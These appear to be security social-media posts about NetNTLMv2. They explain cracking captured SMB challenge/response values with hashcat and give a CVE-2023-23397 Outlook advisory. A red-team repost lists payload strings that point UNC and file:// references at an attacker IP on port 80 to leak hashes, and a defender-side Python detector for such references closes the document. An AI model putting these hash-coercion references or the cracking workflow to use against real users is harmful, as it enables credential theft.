#netntlmv2

2024-08-16

One example of why to use strong #passwords for users who use file sharing over #SMB, even when the file transfers are #encrypted.
If the SMB traffic is captured/eavesdropped, then the attacker can try to crack the user password.
The attacker is able to extract challenge/response values from the Session Setup and then use #passwordcracking tools such as #hashcat.

If the attack is successful, the attacker will not only gain access to the user account, but it is also possible to decrypt the captured SMB file transfers. There is a lack of perfect forward secrecy in this encryption.

For more details and practical examples, see this blog post:

malwarelab.eu/posts/tryhackme-

#networktrafficanalysis #networktraffic #encryption #netntlmv2 #netntlm #ntlm #windows #fileshare #pentesting #cybersecurity #hardening #password #cracking #offensivesecurity #offsec #blueteam #purpleteam

Image captions: extraction of challenge/response parameters from the pcap with tshark; cracking password with hashcat, example of dictionary attack against NetNTLMv2; NT Password in Wireshark NTLMSSP protocol preferences; decrypted SMB traffic
SECUINFRA Falcon Team SI_FalconTeam@infosec.exchange
2023-03-15

🚨#CVE-2023-23397 is a new vulnerability in Microsoft #Outlook leading to an Elevation of Privilege through collecting #NetNTLMv2 hashes. Crafted Exchange messaging items (Mail, Calendar, Tasks) may contain a UNC path in the PidLidReminderFileParameter property.
Patch now!

Microsoft released a #Powershell script to check onPrem and Cloud Exchange instances for malicious message items: microsoft.github.io/CSS-Exchan

NVD: nvd.nist.gov/vuln/detail/CVE-2

According to @BleepinComputer
MSFT identified #APT28 exploiting this vuln before: bleepingcomputer.com/news/micr

For more details on the exploit check out the write-up by MDSec below ⬇️
twitter.com/MDSecLabs/status/1

#infosec #cybersecurity #blueteam

RT @mynameisv__@twitter.com

Did you know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\t
or pdf : /F (\\\\IP@80\\t)
or dubdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
or: IconFile=\\IP@80\t.ico

#RedTeam #NTLM cc @ddouhine@twitter.com

🐦🔗: twitter.com/mynameisv__/status
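
A defender-side check for the reference forms listed in the post above, added here as an example (it is not part of the quoted posts). It flags UNC and `file://` references whose host carries an `@<port>` suffix, generalised to any port number; the function names, the sample strings and the `@SSL@<port>` variant are assumptions made for the example.

```python
import re

# Forms from the post: \\host@80\..., \\\\host@80\\... (escaped, as in a PDF
# string), file://host@80/... and ///host@80/...
# Assumption: the @SSL@<port> variant is not in the post; it is included
# because Windows WebDAV UNC paths accept it as well.
PORT_REF = re.compile(
    r"(?:\\{2,4}|file:/{2,3}|(?<![:/])/{3})"   # UNC or file URL prefix
    r"(?P<host>[A-Za-z0-9._-]+)"               # host name or IP address
    r"(?:@SSL)?@(?P<port>\d{1,5})"             # explicit port on the host
    r"(?=[\\/])",                              # followed by a path separator
    re.IGNORECASE,
)

def find_port_redirected_refs(text):
    """Return (host, port) for every host@port style reference in text."""
    hits = []
    for m in PORT_REF.finditer(text):
        port = int(m.group("port"))
        if 0 < port <= 65535:
            hits.append((m.group("host"), port))
    return hits

def scan_samples(samples):
    """Map each sample name to the references found in its content."""
    return {name: find_port_redirected_refs(body) for name, body in samples.items()}

# Constructed sample content (192.0.2.0/24 is a documentation range).
SAMPLES = {
    "link.url": r"URL=file://192.0.2.10@80/t.htm",
    "icon.url": r"IconFile=\\192.0.2.10@8080\t.ico",
    "doc.pdf": r"/F (\\\\192.0.2.10@80\\t)",
    "dav_ssl.lnk": r"\\192.0.2.10@SSL@443\t",
    "benign.lnk": r"\\fileserver.example\share\report.docx",
    "benign.url": r"URL=file:///C:/Users/a/readme.txt",
}

if __name__ == "__main__":
    for name, hits in scan_samples(SAMPLES).items():
        print(f"{name}: {'FLAG ' + str(hits) if hits else 'ok'}")
```
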
